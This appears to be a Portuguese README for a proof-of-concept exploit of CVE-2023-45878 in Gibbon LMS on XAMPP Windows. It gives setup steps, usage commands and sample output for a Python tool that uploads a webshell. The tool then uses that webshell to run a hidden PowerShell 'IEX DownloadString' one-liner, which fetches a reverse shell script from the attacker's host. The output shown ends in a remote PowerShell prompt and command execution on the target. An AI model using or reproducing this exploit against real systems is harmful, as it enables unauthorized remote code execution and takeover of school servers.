
CVE-2023-45878 poc para gibbon LMS no xampp windows
POC do CVE-2023-45878 para Gibbon LMS no XAMPP Windows. Faz upload de uma webshell chamada shell.php para injeção de comandos. Para shell reversa, faz upload de um script ps1 de shell reversa do PowerShell chamado shell.ps1, que é enviado para a máquina alvo usando o shell.php.
Python3 Módulo Requests do python3 netcat
pip3 install requests
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests
Testado no Gibbon LMS que estava rodando no XAMPP Windows sem AV habilitado. O alvo pode ser encontrado usando a página de login do Gibbon, por exemplo http://gibbon-example/Gibbon-LMS/
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT
[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP
PS C:\xampp\htdocs\Gibbon-LMS>
python3 reverse.py --single -target_url http://target -command whoami
[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice